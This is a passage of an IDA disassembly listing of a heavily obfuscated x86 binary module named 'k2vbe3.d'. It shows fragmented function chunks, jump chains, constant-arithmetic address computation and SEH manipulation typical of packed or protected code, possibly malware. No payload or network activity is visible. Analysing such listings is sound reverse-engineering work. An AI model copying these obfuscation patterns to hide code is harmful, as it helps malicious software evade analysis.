; FUNCTION CHUNK AT 00447871 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044899C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00448D20 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00448D59 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044ADB2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B9FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C27C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C5AF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044E108 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E33F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044E789 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E7FA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044F334 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F4E4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F76F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450548 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00450DE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451350 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452226 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452580 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453A97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045464D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A33 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455034 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455AEB SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045A4ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AB5B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045B96E SIZE 00000014 BYTES

		pop	edx
		jnb	loc_44F334
		call	sub_45BE5C

loc_44D0E1:				; CODE XREF: sub_446212+18j
		jmp	loc_44C5AF
sub_44D0D5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_44D0E6:				; CODE XREF: sub_44F20A+93D3j
		call	sub_44D345
		push	offset loc_442652
		jmp	nullsub_278
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_44D0F5:				; CODE XREF: sub_443F0D:loc_44962Fj
		xchg	esi, [esp+20h+var_20]
		lea	eax, sub_441A09
		push	eax
		push	0
		push	edx
		push	94F78F8Fh
		jmp	loc_44FCAA
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_44D10C:				; CODE XREF: sub_457D4B-11C24j
		jl	loc_43E37C
		adc	eax, ecx
		pop	ecx
		jnp	loc_45AD60
		add	ecx, ebp
		sbb	edi, 0E40D253Ah
		jmp	loc_43E37C
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_44D128:				; CODE XREF: sub_4423D2:loc_4542F6j
		push	edx
		push	0FED4727Ch
		pop	edx
		or	edx, 0CD4E3FB5h
		sub	edx, 1A2954DEh
		rol	edx, 0Dh
		jmp	loc_45ABBE
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_44D143:				; CODE XREF: sub_44471B-30EEj
		jge	loc_44491F
		ja	loc_457C28
		cdq
		jmp	loc_453802
; END OF FUNCTION CHUNK	FOR sub_44471B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_132. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408BD

loc_44D156:				; CODE XREF: sub_4408BD+19D17j
		jmp	loc_44C89F
; END OF FUNCTION CHUNK	FOR sub_4408BD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_275. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44D15C:				; CODE XREF: k2vbe3.d:00443DE6j
		jnz	loc_451997
		xchg	ecx, [esi]
		popf
		pop	ebx
		jmp	loc_44DBB7

; =============== S U B	R O U T	I N E =======================================



sub_44D16B	proc near		; DATA XREF: k2vbe3.d:00447160o

var_10		= dword	ptr -10h

; FUNCTION CHUNK AT 0043DC8C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447BB6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00448CB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449F3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BF47 SIZE 00000028 BYTES

		push	ebx
		call	sub_4498C1

loc_44D171:				; CODE XREF: k2vbe3.d:loc_45A511j
					; sub_44662B+15255j
		push	dword ptr [ebp+10h]
		push	dword ptr [ebp+0Ch]
		push	ecx
		push	0C4BC2F19h
		pop	ecx
		jmp	loc_447BB6
sub_44D16B	endp

; ---------------------------------------------------------------------------

loc_44D183:				; CODE XREF: k2vbe3.d:loc_44DE3Bj
		jz	loc_44B8B9
		jmp	loc_451B4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_44D18E:				; CODE XREF: sub_45C041-6FD7j
		jno	loc_44B3AD
		cdq

loc_44D195:				; CODE XREF: sub_45C041:loc_452104j
		mov	eax, [ebp-4]
		call	sub_454354

loc_44D19D:				; CODE XREF: k2vbe3.d:loc_43D4E9j
		pop	ecx
		rol	ecx, 4
		add	ecx, 0B6DA589Bh
		cmp	ecx, 88FEAD7Ch
		jmp	loc_456506
; END OF FUNCTION CHUNK	FOR sub_45C041
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_356. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44D1B3:				; CODE XREF: k2vbe3.d:004587A7j
		jmp	loc_442105
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_44D1B8:				; CODE XREF: sub_446478+10A72j
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44D1BD:				; CODE XREF: sub_44C90E+2B57j
		xor	ebx, 0E2FA0544h

loc_44D1C3:				; CODE XREF: sub_44C90E:loc_45AC77j
		cmp	dword ptr [ebp-108h], 31342D37h
		jnz	loc_444C96
		jmp	loc_44A087
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2FC

loc_44D1D8:				; CODE XREF: sub_43E2FC+1Dj
		push	ecx
		mov	ecx, esi
		xchg	ecx, [esp+4+var_4]
		push	26962C19h
		pop	esi

loc_44D1E4:				; CODE XREF: k2vbe3.d:loc_448812j
		rol	esi, 0Ch
		jmp	loc_43E9B6
; END OF FUNCTION CHUNK	FOR sub_43E2FC
; ---------------------------------------------------------------------------

loc_44D1EC:				; CODE XREF: k2vbe3.d:00449276j
		or	edi, 0CB21D5B6h
		and	edx, 255D97F1h
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_44D1F8:				; CODE XREF: sub_44A79B:loc_459703j
		xor	ebx, 0DF5686EBh
		or	ebx, 0AFA1C69Ah
		jmp	loc_444BE0
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F31

loc_44D209:				; CODE XREF: sub_445FB0+1Bj
		pop	eax
		add	eax, 0D1071320h
		rol	eax, 18h
		and	eax, 0BFEE2E5Eh
		xor	eax, 3C233DAAh
		add	eax, ebp
		push	offset loc_44D4AB
		jmp	loc_457D95
; END OF FUNCTION CHUNK	FOR sub_442F31
; ---------------------------------------------------------------------------

loc_44D22B:				; CODE XREF: k2vbe3.d:0044B6FFj
		jns	loc_447F38

loc_44D231:				; CODE XREF: k2vbe3.d:loc_4596CDj
		add	eax, 0DCD199D5h
		add	eax, ebp
		add	eax, 45A0C0AFh
		mov	eax, [eax]
		movzx	eax, word ptr [eax+6]
		push	edi
		jmp	loc_447B7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44D24B:				; CODE XREF: sub_440C94-2472j
		add	edi, 7A8AFB9Dh
		mov	[edi], edx
		pop	edi
; END OF FUNCTION CHUNK	FOR sub_440C94
; START	OF FUNCTION CHUNK FOR sub_451759

loc_44D254:				; CODE XREF: sub_451759-669Cj
					; sub_451759-5D9Aj
		xchg	eax, edx
		jmp	loc_448F00
; END OF FUNCTION CHUNK	FOR sub_451759
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44D25A:				; CODE XREF: sub_43CCD0+1A0D0j
		add	edx, 0B66BCE25h
		cmp	ebx, edx
		jmp	loc_4556CC
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_251. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44D268:				; CODE XREF: k2vbe3.d:00459995j
		jmp	loc_454E99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E2A4

loc_44D26D:				; CODE XREF: sub_44E2A4+7AFFj
		jmp	loc_45B5F3
; END OF FUNCTION CHUNK	FOR sub_44E2A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44D272:				; CODE XREF: sub_44B912-A53Ej
		jmp	loc_44DDC4
; END OF FUNCTION CHUNK	FOR sub_44B912

; =============== S U B	R O U T	I N E =======================================



sub_44D277	proc near		; DATA XREF: k2vbe3.d:004593E5o
		call	nullsub_522

loc_44D27C:				; CODE XREF: k2vbe3.d:00449E19j
		jmp	ds:dword_41E1B4
sub_44D277	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_522. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		or	al, 24h
		mov	edx, ecx
		call	sub_443E73
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44D28C:				; CODE XREF: sub_44ED3C+Fj
					; k2vbe3.d:00458432j
		jmp	loc_45424B
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FED

loc_44D291:				; CODE XREF: sub_456FED-8E9Cj
		jmp	loc_4561AD
; END OF FUNCTION CHUNK	FOR sub_456FED
; ---------------------------------------------------------------------------

loc_44D296:				; CODE XREF: k2vbe3.d:00444F14j
		mov	esi, [ebx]

; =============== S U B	R O U T	I N E =======================================



sub_44D298	proc near		; CODE XREF: sub_4424CF-1E0Dp

; FUNCTION CHUNK AT 0043E884 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FF06 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440B24 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442158 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442D7F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448710 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448E7B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448F35 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00449C08 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044A78F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044ADE1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B7F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D051 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E92D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044FB03 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450B71 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450FC7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045165E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004522B5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004528C1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004555EE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456434 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00456F2B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458416 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459965 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A522 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		shl	eax, cl
		mov	edx, [ebp-20h]
		jmp	loc_43E884
sub_44D298	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D2A6:				; CODE XREF: k2vbe3.d:00455ADAj
		cmp	edx, 0E148F5B2h
		jmp	loc_44BB80
; ---------------------------------------------------------------------------

loc_44D2B1:				; DATA XREF: sub_4420B5+Ao
		xchg	edx, [esp]
		jmp	loc_4594BF
; ---------------------------------------------------------------------------
		and	ebp, 27BB42E7h
		jmp	sub_449392
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444144

loc_44D2C4:				; CODE XREF: sub_444144:loc_448012j
		jz	loc_44C68B
		jnb	sub_455CC3
		test	ecx, 45FE966h

loc_44D2D6:				; CODE XREF: k2vbe3.d:loc_43FF75j
		jmp	loc_448FBD
; END OF FUNCTION CHUNK	FOR sub_444144
; ---------------------------------------------------------------------------

loc_44D2DB:				; CODE XREF: k2vbe3.d:00441CE6j
		jnz	loc_446E36
		jmp	loc_446A79
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_411. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44D2E7:				; CODE XREF: k2vbe3.d:00446C35j
		jmp	loc_446536
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44D2EC:				; CODE XREF: sub_44B94B-BD80j
		jmp	loc_45B0C4
; END OF FUNCTION CHUNK	FOR sub_44B94B

; =============== S U B	R O U T	I N E =======================================



sub_44D2F1	proc near		; CODE XREF: k2vbe3.d:loc_4551F6j
					; DATA XREF: sub_442DA4+B332o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CFAB SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00442FCB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449AAB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BB10 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DA6A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044E60B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044ED50 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FD5B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450427 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004574DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458191 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459F66 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045B534 SIZE 00000005 BYTES

		pop	ebp
		mov	eax, ds:dword_444F3C
		or	eax, eax
		jnz	loc_45AE9C
		jmp	loc_44ED50
sub_44D2F1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D305:				; CODE XREF: k2vbe3.d:0044009Bj
		pop	ebp
		jmp	loc_4493F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44D30B:				; CODE XREF: sub_4553CC:loc_44275Aj
		jnz	loc_45A7E0
		jmp	loc_454A29
; END OF FUNCTION CHUNK	FOR sub_4553CC

; =============== S U B	R O U T	I N E =======================================



sub_44D316	proc near		; CODE XREF: k2vbe3.d:00448DE4j
					; sub_45A9B3+8p

; FUNCTION CHUNK AT 0043CD83 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00443762 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00446828 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044784F SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044DC7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E9F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451C51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045486F SIZE 00000012 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		jnz	loc_446833
		mov	eax, [ebp+8]
		jmp	loc_45486F
sub_44D316	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BB9D

loc_44D328:				; CODE XREF: sub_45BB9D+15j
		jz	loc_45975C
		jmp	loc_447858
; END OF FUNCTION CHUNK	FOR sub_45BB9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437D3

loc_44D333:				; CODE XREF: sub_4437D3:loc_44AE81j
		ror	ebx, 0Bh
		test	esi, ecx
		jmp	loc_459B3C
; END OF FUNCTION CHUNK	FOR sub_4437D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44D33D:				; CODE XREF: sub_456666-198C5j
		mov	[ebp-4], eax
		jmp	loc_457852
; END OF FUNCTION CHUNK	FOR sub_456666

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44D345	proc near		; CODE XREF: sub_44F20A-10D08p
					; sub_44F20A:loc_44D0E6p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00443CE7 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044757D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453A92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454CF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458B69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A1E0 SIZE 00000021 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp+var_4], eax

loc_44D34E:				; CODE XREF: sub_44D345-5DC5j
		jno	loc_443CE7
		mov	eax, [ebp+var_4]
		jmp	loc_458B69
sub_44D345	endp

; ---------------------------------------------------------------------------

loc_44D35C:				; CODE XREF: k2vbe3.d:0043D0EEj
		mov	esi, eax
		push	offset sub_4474F9
		jmp	sub_453FD5
; ---------------------------------------------------------------------------
		sbb	ebp, 0F31FF6D2h
		jmp	sub_44F6FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA73

loc_44D373:				; CODE XREF: sub_44CA73+8j
		or	ecx, ecx
		jz	loc_445424
		call	sub_441109
		jnz	loc_4430D9
		mov	ecx, [ebx+edx-4]
		or	ecx, ecx
		jmp	loc_44C1DF
; END OF FUNCTION CHUNK	FOR sub_44CA73

; =============== S U B	R O U T	I N E =======================================



sub_44D391	proc near		; CODE XREF: sub_442F31+307Ap
					; k2vbe3.d:004535B7j
		xchg	esi, [esp+0]
		pop	esi
		add	eax, 18h
		mov	[ebp-10h], eax
		mov	eax, [ebp-10h]
		jmp	loc_43F274
sub_44D391	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44D3A3	proc near		; CODE XREF: sub_441EBE+7j

; FUNCTION CHUNK AT 0043D095 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441FE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F187 SIZE 0000001F BYTES

		add	esp, 0FFFFFFE4h
		jmp	loc_441FE6
sub_44D3A3	endp


; =============== S U B	R O U T	I N E =======================================



sub_44D3AB	proc near		; DATA XREF: sub_445EB0-8398o
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_451CE5
		push	edx
		push	offset loc_4482C0
		jmp	nullsub_82
sub_44D3AB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_44D3C2:				; CODE XREF: sub_443FC1-1974j
		jnz	loc_446853
; END OF FUNCTION CHUNK	FOR sub_443FC1
; START	OF FUNCTION CHUNK FOR sub_456FED

loc_44D3C8:				; CODE XREF: sub_456FED+Dj
		jmp	loc_44E133
; END OF FUNCTION CHUNK	FOR sub_456FED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456208

loc_44D3CD:				; CODE XREF: sub_456208-4E7Fj
		jmp	nullsub_306
; END OF FUNCTION CHUNK	FOR sub_456208
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_44D3D2:				; CODE XREF: sub_443FC1+870j
		jmp	loc_459C0A
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------

loc_44D3D7:				; CODE XREF: k2vbe3.d:004401BDj
		jmp	loc_442605
; ---------------------------------------------------------------------------
		xor	ebp, 25D86095h
		sbb	edi, 1FA19A51h
		mov	[edx], ebp
		or	eax, esi
		jmp	loc_446853
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_44D3F1:				; CODE XREF: k2vbe3.d:loc_446536j
					; sub_45BE94-CC09j
		xchg	eax, [esp+8+var_8]
		mov	edx, eax
		call	sub_45B74D
		xchg	eax, [esp+8+var_8]
		jmp	loc_445513
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------

locret_44D403:				; CODE XREF: k2vbe3.d:loc_452A15j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44D404:				; CODE XREF: sub_44B94B+6C8j
		jmp	loc_44F7EE
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_44D409:				; CODE XREF: sub_44416D+1407j
		jmp	loc_4504CB
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_44D40E:				; CODE XREF: sub_44DCF5-97ADj
					; sub_459A60:loc_4592C6j
		adc	ecx, 18A5E98h
		jmp	loc_44B0E2
; END OF FUNCTION CHUNK	FOR sub_44DCF5

; =============== S U B	R O U T	I N E =======================================



sub_44D419	proc near		; DATA XREF: sub_45227C:loc_44C65Ao

; FUNCTION CHUNK AT 0044E349 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EC42 SIZE 00000008 BYTES

		add	ecx, 73FE58D3h
		mov	[ecx], eax
		pop	ecx
		lea	eax, sub_4427BF
		jmp	loc_44EC42
sub_44D419	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D42D:				; CODE XREF: k2vbe3.d:0043FD64j
		call	nullsub_20
		call	sub_4486D7
		push	ecx

loc_44D438:				; CODE XREF: k2vbe3.d:0043DA91j
		push	2A63762h
		pop	ecx
		sub	ecx, 0F0BE9583h
		cmp	ecx, 7F4E30F0h
		jmp	loc_443971
; ---------------------------------------------------------------------------

loc_44D44F:				; CODE XREF: k2vbe3.d:0043CAE7j
		mov	eax, [esp]
		push	edx
		call	sub_4479A1
		push	offset loc_44D771
		jmp	locret_45809C
; ---------------------------------------------------------------------------

loc_44D462:				; CODE XREF: k2vbe3.d:0044AA5Fj
		mov	edx, ecx
		push	offset sub_4471DC
		jmp	locret_44A265
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_44D46E:				; CODE XREF: sub_43FF90:loc_45C036j
		call	sub_455F6B
		push	0DF03690h
		mov	eax, 688E02EFh
		jmp	loc_443EAE
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------

loc_44D482:				; CODE XREF: k2vbe3.d:0044260Dj
		xchg	edx, [esp]
		mov	edi, edx
		pop	edx
		xchg	edi, [esp]
		jmp	loc_458171
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F54

loc_44D490:				; CODE XREF: sub_458F54:loc_457053j
		push	0FEB710EEh
		call	sub_44600A
; END OF FUNCTION CHUNK	FOR sub_458F54
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_44D49A:				; CODE XREF: sub_4467A1-373Aj
		jmp	loc_44F378
; END OF FUNCTION CHUNK	FOR sub_4467A1

; =============== S U B	R O U T	I N E =======================================



sub_44D49F	proc near		; CODE XREF: sub_4586B3:loc_45523Bj
		push	ebp
		pop	edi
		xchg	edi, [esp+0]
		mov	ebp, esp
		jmp	loc_455521
sub_44D49F	endp

; ---------------------------------------------------------------------------

loc_44D4AB:				; DATA XREF: sub_442F31+A2F0o
		add	eax, 737AC34Eh
		push	ecx
		push	eax
		pop	ecx
		xchg	ecx, [esp]
		push	edi
		mov	edi, ebx
		xchg	edi, [esp]
		jmp	loc_44B4FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_44D4C2:				; CODE XREF: sub_45482D+240Ej
		sub	ecx, ebp

loc_44D4C4:				; CODE XREF: sub_45482D:loc_4579F6j
		push	46AAF7C1h
		pop	eax

loc_44D4CA:				; CODE XREF: k2vbe3.d:00453374j
		and	eax, 0B31018ECh
		sub	eax, 0CB195F6Eh
		rol	eax, 13h
		and	eax, 88D06886h
		jmp	loc_4416BC
; END OF FUNCTION CHUNK	FOR sub_45482D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_44D4E4:				; CODE XREF: sub_44662B-53CDj
					; sub_456666:loc_44A8BBj
		pop	large dword ptr	fs:0
		add	esp, 4
		push	0D6F7B584h
		pop	eax
		sub	eax, 28EBA943h
		jmp	loc_444695
; END OF FUNCTION CHUNK	FOR sub_44662B

; =============== S U B	R O U T	I N E =======================================



sub_44D4FF	proc near		; DATA XREF: sub_45B64A+5o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0045558B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A850 SIZE 0000000E BYTES

		call	sub_444B3E
		mov	eax, 469EF90Dh
		push	ebx
		push	0BCF0387Bh
		pop	ebx
		or	ebx, 7D99EC8h
		jmp	loc_45558B
sub_44D4FF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44D51B:				; CODE XREF: sub_4424CF:loc_44ECC9j
		jz	loc_45617A
; END OF FUNCTION CHUNK	FOR sub_4424CF
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44D521:				; CODE XREF: sub_44ED3C-FCB0j
		jmp	loc_45C262
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D98C

loc_44D527:				; CODE XREF: sub_43D98C+4E60j
		jmp	nullsub_221
; END OF FUNCTION CHUNK	FOR sub_43D98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_44D52C:				; CODE XREF: sub_44B2D7-EC15j
		jmp	loc_449A5B
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455A4F

loc_44D531:				; CODE XREF: sub_455A4F+4j
		push	esi
		push	49167782h
		xor	esi, 709E755Eh
		jmp	loc_459E4F
; END OF FUNCTION CHUNK	FOR sub_455A4F
; ---------------------------------------------------------------------------
		jmp	ds:off_41E204
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_44D548:				; CODE XREF: k2vbe3.d:loc_4436F7j
					; sub_443FC1+DCD9j ...
		pop	edx
		jnz	loc_451C9F
		mov	eax, [esp-10h+arg_C]
		push	eax
		mov	eax, edx
		xchg	eax, [esp-0Ch+arg_8]
		call	sub_455F6B
		jmp	loc_444821
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44D562:				; CODE XREF: sub_43CCD0:loc_4482D7j
		push	edx
		mov	edx, eax
		xchg	edx, [esp+0Ch+var_C]
		call	sub_45A323
		push	eax
		jmp	loc_455EB9
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_44D573:				; DATA XREF: sub_4514E2:loc_457C65o
		pop	ebp
		push	ds:dword_441228
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A6B1

loc_44D57B:				; CODE XREF: sub_45A6B1+8j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_45A6B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4588FD

loc_44D580:				; CODE XREF: sub_4588FD+3j
		jmp	loc_4481E3
; END OF FUNCTION CHUNK	FOR sub_4588FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA63

loc_44D585:				; CODE XREF: sub_45AA63-64DAj
		jmp	loc_43FEDB
; END OF FUNCTION CHUNK	FOR sub_45AA63
; ---------------------------------------------------------------------------

loc_44D58A:				; CODE XREF: k2vbe3.d:00445EE7j
		jmp	loc_45A8A5
; ---------------------------------------------------------------------------

loc_44D58F:				; CODE XREF: k2vbe3.d:00442067j
		jmp	loc_43D27D

; =============== S U B	R O U T	I N E =======================================



sub_44D594	proc near		; CODE XREF: sub_442DF0:loc_44789Bp
					; sub_442DF0+D5BCp

; FUNCTION CHUNK AT 0043E6C0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044CF53 SIZE 0000000D BYTES

		mov	eax, cs
		xor	al, al
		jmp	loc_44CF53
sub_44D594	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44D59D	proc near		; DATA XREF: sub_43CCD0:loc_4501F5o

